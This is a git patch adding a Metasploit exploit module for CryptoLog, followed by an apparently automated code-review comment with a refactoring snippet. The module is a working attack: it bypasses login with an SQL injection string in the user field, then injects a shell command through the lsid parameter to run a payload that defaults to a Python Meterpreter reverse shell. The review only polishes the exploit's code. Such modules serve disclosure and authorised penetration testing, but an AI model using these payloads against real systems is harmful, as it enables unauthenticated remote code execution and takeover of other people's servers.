From 77acbb82001d0d4e80ba02997ae3b606c2372789 Mon Sep 17 00:00:00 2001
From: Mehmet Ince
Date: Wed, 3 May 2017 01:05:40 +0300
Subject: [PATCH] Adding cryptolog rce
---
 modules/exploits/linux/http/cryptolog_exec.rb | 119 ++++++++++++++++++
 1 file changed, 119 insertions(+)
 create mode 100644 modules/exploits/linux/http/cryptolog_exec.rb
diff --git a/modules/exploits/linux/http/cryptolog_exec.rb b/modules/exploits/linux/http/cryptolog_exec.rb
new file mode 100644
index 0000000000..e592eba5ec
--- /dev/null
+++ b/modules/exploits/linux/http/cryptolog_exec.rb
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "CryptoLOG Remote Code Execution",
+ 'Description' => %q{
+ This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
+ terminal command under the context of the web user.
+
+ login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
+ and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
+
+ logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having
+ a valid session. One user parameter is used by the application while executing operating system command which cause a command injection vulnerability
+
+ Combining these vulnerabilities gives us opportunity execute operation system with web user privilege.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mehmet Ince ' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'Privileged' => false,
+ 'DisclosureDate' => "May 3 2017",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
+ ], self.class)
+ end
+
+ def check
+ r = rand_text_alpha(15)
+ i = rand_text_numeric(5)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
+ 'vars_get' => {
+ 'act' => 'login'
+ },
+ 'vars_post' => {
+ 'user' => "#{r}' OR #{i}=#{i}-- #{r}",
+ 'pass' => "#{r}"
+ }
+ })
+
+ if res && res.code == 302 && res.headers.include?('Set-Cookie')
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ print_status("Bypassing login by exploiting SQLi flaw")
+
+ r = rand_text_alpha(15)
+ i = rand_text_numeric(5)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
+ 'vars_get' => {
+ 'act' => 'login'
+ },
+ 'vars_post' => {
+ 'user' => "#{r}' OR #{i}=#{i}-- #{r}",
+ 'pass' => "#{r}"
+ }
+ })
+
+ if res && res.code == 302 && res.headers.include?('Set-Cookie')
+ cookie = res.get_cookies
+ print_good("Successfully logged in")
+ else
+ fail_with(Failure::Unknown, "Something went wrong.")
+ end
+
+ print_status("Exploiting command injection flaw")
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
+ 'cookie' => cookie,
+ 'vars_post' => {
+ 'opt' => "check",
+ 'lsid' => "$(python -c \"#{payload.encoded}\")",
+ 'lssharetype' => "#{r}"
+ }
+ })
+
+ end
+end
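Review bot: `include Msf::Exploit::Remote::SSH` on the twelfth added line is dead: neither check nor exploit uses anything but HttpClient, so the mixin should be removed rather than pulling SSH support (and whatever options it registers) into a purely HTTP module. check and exploit also repeat the same login.php request and the same 302/Set-Cookie test verbatim; moving that into one private helper that returns the session cookie or nil keeps the two code paths from drifting apart, and lets check stay a one-liner. `fail_with(Failure::Unknown, "Something went wrong.")` tells the operator nothing about which step failed; `fail_with(Failure::NoAccess, 'Login bypass failed: no session cookie returned')` names it. Finally, the description never says which CryptoLog versions are affected; if the referenced advisory gives a range, it belongs in the description so readers can tell a patched instance from a vulnerable one.
```ruby
  # Attempts the login bypass and returns the session cookie, or nil when the
  # reply is not a 302 carrying Set-Cookie. Shared by check and exploit.
  def login_bypass
    r = rand_text_alpha(15)
    i = rand_text_numeric(5)
    res = send_request_cgi(
      # … unchanged: the login.php request hash already used by check …
    )
    return nil unless res && res.code == 302 && res.headers.include?('Set-Cookie')
    res.get_cookies
  end

  def check
    login_bypass ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end
```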